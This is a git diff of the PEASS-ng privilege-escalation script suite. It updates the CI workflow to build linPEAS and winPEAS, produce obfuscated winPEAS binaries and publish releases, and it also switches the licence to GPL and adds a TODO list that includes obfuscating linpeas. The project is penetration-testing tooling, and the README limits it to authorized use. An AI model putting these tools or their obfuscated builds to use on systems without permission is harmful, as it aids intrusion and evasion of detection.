Merge 07a2db8553 into 21d3b3f349

trigger action

.github/workflows/CI-master_tests.yml

@@ -8,10 +8,8 @@ on:
   workflow_dispatch:
 
 jobs:
-
   Build_and_test_winpeas_master:
     runs-on: windows-latest
-    needs: Build_and_test_linpeas_master
     
     # environment variables
     env:
@@ -24,10 +22,7 @@ jobs:
       - name: Checkout
         uses: actions/checkout@master
         with:
-          persist-credentials: false
-          # Otherwise, you will failed to push refs to dest repo.
-          fetch-depth: 0
-          ref: refs/heads/${{ github.head_ref }}
+          ref: ${{ github.head_ref }}
             
       # Add  MSBuild to the PATH: https://github.com/microsoft/setup-msbuild
       - name: Setup MSBuild.exe
@@ -89,78 +84,192 @@ jobs:
       # copy the files
       - name: Copy Dotfuscator generated files
         run: |
-            cp $env:DotFuscatorGeneratedPath\x64\winPEASx64.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64.exe"            
-            cp $env:DotFuscatorGeneratedPath\x86\winPEASx86.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86.exe"
-            cp $env:DotFuscatorGeneratedPath\any\winPEASany.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany.exe"
-      # Git add
-      - name: Create local changes
-        run: |
-            git add winPEAS\winPEASexe\binaries\Release\*
-            git add winPEAS\winPEASexe\binaries\x64\*
-            git add winPEAS\winPEASexe\binaries\x86\*
-            git add "winPEAS\winPEASexe\binaries\Obfuscated Releases\*.exe"
-      # Git commit
-      - name: Commit results to Github
-        run: |
-          git config --local user.email "ci@winpeas.com"
-          git config --global user.name "CI-winpeas"
-          git pull origin "${{ github.ref }}" --autostash --rebase -Xours
-          git commit -m "winpeas binaries auto update" -a --allow-empty
+            cp $env:DotFuscatorGeneratedPath\x64\winPEASx64.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe"            
+            cp $env:DotFuscatorGeneratedPath\x86\winPEASx86.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe"
+            cp $env:DotFuscatorGeneratedPath\any\winPEASany.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe"
       
-      # Git push
-      - name: Push changes
-        uses: ad-m/github-push-action@master
+      # Upload all the versions for the release
+      - name: Upload winpeasx64
+        uses: actions/upload-artifact@v2
         with:
-          branch: refs/heads/${{ github.head_ref }}
-          github_token: ${{ secrets.GITHUB_TOKEN }}
-          force: true
+          name: winPEASx64.exe
+          path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe
+      
+      - name: Upload winpeasx86
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEASx86.exe
+          path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe
+      
+      - name: Upload winpeasany
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEASany.exe
+          path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe
+      
+      - name: Upload winpeasx64ofs
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEASx64_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
+      
+      - name: Upload winpeasx86ofs
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEASx86_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
+          
+      - name: Upload winpeasanyofs
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEASany_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
+      
+      - name: Upload winpeas.bat
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEAS.bat
+          path: winPEAS\winPEASbat\winPEAS.bat
+          
+      # Git add
+      #- name: Create local changes
+      #  run: |
+      #      git add winPEAS\winPEASexe\binaries\Release\*
+      #      git add winPEAS\winPEASexe\binaries\x64\*
+      #      git add winPEAS\winPEASexe\binaries\x86\*
+      #      git add "winPEAS\winPEASexe\binaries\Obfuscated Releases\*.exe"
+      # Git commit
+      #- name: Commit results to Github
+      #  run: |
+      #    git config --local user.email "ci@winpeas.com"
+      #    git config --global user.name "CI-winpeas"
+      #    git pull origin "${{ github.ref }}" --autostash --rebase -Xours
+      #    git commit -m "winpeas binaries auto update" -a --allow-empty
+      # Git push
+      #- name: Push changes
+      #  uses: ad-m/github-push-action@master
+      #  with:
+      #    branch: ${{ github.head_ref }}
+      #    github_token: ${{ secrets.GITHUB_TOKEN }}
+      #    force: true
 
   Build_and_test_linpeas_master:
     runs-on: ubuntu-latest
 
     steps:
+      # Download repo
       - uses: actions/checkout@v2
         with:
-          persist-credentials: false
-          # Otherwise, you will failed to push refs to dest repo.
-          fetch-depth: 0
-          ref: refs/heads/${{ github.head_ref }}
+          ref: ${{ github.head_ref }}
       
+      # Setup go
+      - uses: actions/setup-go@v2
+        with:
+          go-version: 1.17.0-rc1
+          stable: false
+      - run: go version
+      
+      # Build linpeas
       - name: Build linpeas
         run: |
           python3 -m pip install PyYAML
           cd linPEAS
           python3 -m builder.linpeas_builder
       
+      # Build linpeas binaries
+      - name: Build linpeas binaries 
+        run: |
+          git clone https://github.com/carlospolop/sh2bin
+          cd sh2bin
+          bash build.sh ../linPEAS/linpeas.sh
+          mv builds/sh2bin_linux_386 builds/linpeas_linux_386
+          mv builds/sh2bin_linux_amd64 builds/linpeas_linux_amd64
+          mv builds/sh2bin_linux_arm builds/linpeas_linux_arm
+          mv builds/sh2bin_linux_arm64 builds/linpeas_linux_arm64
+          mv builds/sh2bin_darwin_amd64 builds/linpeas_darwin_amd64
+          mv builds/sh2bin_darwin_arm64 builds/linpeas_darwin_arm64
+          ls -lR ./ 
+            
+      # Run linpeas help as quick test
       - name: Run linpeas help
         run: linPEAS/linpeas.sh -h
       
+      # Run linpeas as a test
       - name: Run linpeas
-        run: linPEAS/linpeas.sh -t
+        run: linPEAS/linpeas.sh -a -D
       
-      - name: Create local changes
-        run: git add linPEAS/linpeas.sh
-
-      - name: Commit results to Github
-        run: |
-          git config --local user.email ""
-          git config --global user.name "CI-linpeas-ubuntu"
-          git pull origin "${{ github.ref }}" --autostash --rebase -Xours
-          git commit -m "linpeas.sh auto update" -a --allow-empty
-      
-      - name: Push changes
-        uses: ad-m/github-push-action@master
+      # Upload files for release
+      - name: Upload linpeas.sh
+        uses: actions/upload-artifact@v2
         with:
-          branch: refs/heads/${{ github.head_ref }}
-          github_token: ${{ secrets.GITHUB_TOKEN }}
-          force: true
+          name: linpeas.sh
+          path: linPEAS/linpeas.sh
+      
+      ## Linux bins
+      - name: Upload linpeas_linux_386
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_linux_386
+          path: sh2bin/builds/linpeas_linux_386
+      
+      - name: Upload linpeas_linux_amd64
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_linux_amd64
+          path: sh2bin/builds/linpeas_linux_amd64
+      
+      - name: Upload linpeas_linux_arm
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_linux_arm
+          path: sh2bin/builds/linpeas_linux_arm
+          
+      - name: Upload linpeas_linux_arm64
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_linux_arm64
+          path: sh2bin/builds/linpeas_linux_arm64
+      
+      ## Darwin bins
+      - name: Upload linpeas_darwin_amd64
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_darwin_amd64
+          path: sh2bin/builds/linpeas_darwin_amd64
+          
+      - name: Upload linpeas_darwin_arm64
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_darwin_arm64
+          path: sh2bin/builds/linpeas_darwin_arm64
+      
+      # Clean sh2bin repo
+      - name: Cleaning sh2bin
+        run: rm -rf sh2bin
+
+     # - name: Create local changes
+     #   run: git add linPEAS/linpeas.sh
+     # - name: Commit results to Github
+     #   run: |
+     #     git config --local user.email ""
+     #     git config --global user.name "CI-linpeas-ubuntu"
+     #     git pull origin "${{ github.ref }}" --autostash --rebase -Xours
+     #     git commit -m "linpeas.sh auto update" -a --allow-empty
+     # - name: Push changes
+     #   uses: ad-m/github-push-action@master
+     #   with:
+     #     branch: ${{ github.head_ref }}
+     #     github_token: ${{ secrets.GITHUB_TOKEN }}
+     #     force: true
   
   Build_and_test_macpeas_master:
     runs-on: macos-latest
 
     steps:
+      # Download repo
       - uses: actions/checkout@v2
       
+      # Build linpeas
       - name: Build macpeas
         run: |
           python3 -m pip install PyYAML
@@ -168,8 +277,108 @@ jobs:
           cd linPEAS
           python3 -m builder.linpeas_builder
       
+      # Run linpeas help as quick test
       - name: Run macpeas help
         run: linPEAS/linpeas.sh -h
       
+      # Run macpeas parts to test it
       - name: Run macpeas
-        run: linPEAS/linpeas.sh -o SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI
+        run: linPEAS/linpeas.sh -D -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information
+
+     
+  Publish_release:
+    runs-on: ubuntu-latest
+    needs: [Build_and_test_winpeas_master, Build_and_test_linpeas_master, Build_and_test_macpeas_master]
+
+    steps:
+    # Download files to release
+    - name: Download winpeasx64ofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx64_ofs.exe
+
+    - name: Download winpeasx86ofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx86_ofs.exe
+
+    - name: Download winpeasanyofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASany_ofs.exe
+
+    - name: Download winpeasx64
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx64.exe
+    
+    - name: Download winpeasx86
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx86.exe
+
+    - name: Download winpeasany
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASany.exe
+    
+    - name: Download winpeas.bat
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEAS.bat
+
+    - name: Download linpeas.sh
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas.sh
+
+    - name: Download linpeas_linux_386
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_linux_386
+
+    - name: Download linpeas_linux_amd64
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_linux_amd64
+
+    - name: Download linpeas_linux_arm
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_linux_arm
+
+    - name: Download linpeas_linux_arm64
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_linux_arm64
+
+    - name: Download linpeas_darwin_amd64
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_darwin_amd64
+
+    - name: Download linpeas_darwin_arm64
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_darwin_arm64
+    
+    # Create the release
+    - name: Create Release
+      id: create_release
+      uses: actions/create-release@v1
+      env:
+        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+      with:
+        tag_name: ${{ github.ref }}
+        release_name: Release ${{ github.ref }}
+        draft: false
+        prerelease: false
+        
+    - id: upload_release_assets
+      uses: dwenegar/upload-release-assets@v1
+      with:
+        release_id: ${{ steps.create_release.outputs.id }}
+        assets_path: .
+      env:
+        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+  

.gitignore

@@ -2,6 +2,7 @@
 winPEAS/winPEASexe/.vs/*
 v16/*
 winPEAS/winPEASexe/.vs/winPEAS/v16/*
+winPEAS/winPEASexe/binaries/**/*.exe
 Debug/*
 winPEAS/winPEASexe/winPEAS/bin/Debug/*
 .DS_Store
@@ -22,3 +23,6 @@ __pycache__
 **/__pycache__
 linPEAS/builder/__pycache__/*
 linPEAS/builder/src/__pycache__/*
+linPEAS/linpeas.sh
+sh2bin
+sh2bin/*

CONTRIBUTING.md

@@ -1,7 +1,10 @@
 # Contributing to this repository
 
 ## Making Suggestions 
-If you wan tto make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**
+If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**
+
+## Do don't know how to help?
+Check out the **[TODO](https://github.com/carlospolop/PEASS-ng/blob/master/TODO.md) page**
 
 ## Searching for files with sensitive information
 From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file.
@@ -10,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens
 Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.
 
 ## Specific LinPEAS additions
-From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**.
+From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*.
 The new linpeas.sh script will be auto-generated in the PR.
 
 ## Specific WinPEAS additions

LICENSE

@@ -1,21 +1,347 @@
-MIT License
+COPYING -- Describes the terms under which peass-ng is distributed. A copy
+of the GNU General Public License (GPL) is appended to this file.
 
-Copyright (c) 2019 Carlos Polop
+peass-ng is (C) 2006-2022 Carlos Polop Martin.
 
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+peass-ng technology into proprietary software, we sell alternative licenses
+(contact me via email, telegram or github issue).
 
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from peass-ng.
+* Reads or includes peass-ng copyrighted files or any file in this repository
+* Executes peass-ng and parses the results (as opposed to typical shell or
+  execution-menu apps, which simply display raw peass-ng output and so are
+  not derivative works).
+* Integrates/includes/aggregates peass-ng into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
 
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
+The term "peass-ng" should be taken to also include any portions or derived
+works of peass-ng. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to peass-ng - we do not speak for other people's
+GPL works.
+
+This license does not apply to the third-party components.
+
+If you have any questions about the GPL licensing restrictions on using
+peass-ng in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate peass-ng into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes for possible
+incorporation into the main distribution. By sending these changes to the
+peass-ng developers or via Git pull request, checking them into the peass-ng
+source code repository, it is understood (unless you specify otherwise)
+that you are offering the peass-ng project the unlimited, non-exclusive
+right to reuse, modify, and relicense the code. peass-ng will always be
+available Open Source, but this is important because the inability to
+relicense code has caused devastating problems for other Free Software
+projects (such as KDE and NASM). If you wish to specify special license
+conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS

README.md

@@ -18,25 +18,21 @@ These tools search for possible **local privilege escalation paths** that you co
 - Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist)**
 - **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
 
+## Quick Start
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+
 ## Let's improve PEASS together
 
 If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file.
 
-## Please, if this tool has been useful for you consider to donate
-
-[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass)
-
 ## PEASS Style
 
 Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/stores/peass)** and show your love for our favorite peas
 
 ## Advisory
 
-All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
+All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
 
 
-## License
-
-MIT License
 
 By Polop<sup>(TM)</sup>

TODO.md

@@ -0,0 +1,28 @@
+# TODO
+
+### Generate Nice Reports
+- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/carlospolop/PEASS-ng/tree/master/parser).
+- [ ] Create a python script that generates a nice HTML/PDF from the JSON output
+
+### Generate a DB of Known Vulnerable Binaries
+- [ ] Create a DB of the md5/sha1 of binaries known to be vulnerable to command execution/Privilege Escalation
+
+### Maintain Updated LinPEAS's known SUID exploits 
+- [ ] Maintain updated LinPEAS's known SUID exploits 
+
+### Network Capabilities for WinPEAS
+- [ ] Give to WinPEAS network host discover capabilities and port scanner capabilities (like LinPEAS has)
+
+### Add More checks to LinPEAS and WinPEAS
+- [ ] Add more checks in LinPEAS
+- [ ] Add more checks in WinPEAS
+
+### Find a way to minify and/or obfuscate LinPEAS automatically
+- [ ] Find a way to minify and/or obfuscate linpeas.sh automatically. If you know a way contact me in Telegram or via github issues
+
+### Create a PEASS-ng Web Page were the project is properly presented
+- [ ] Let me know in Telegram or github issues if you are interested in helping with this
+
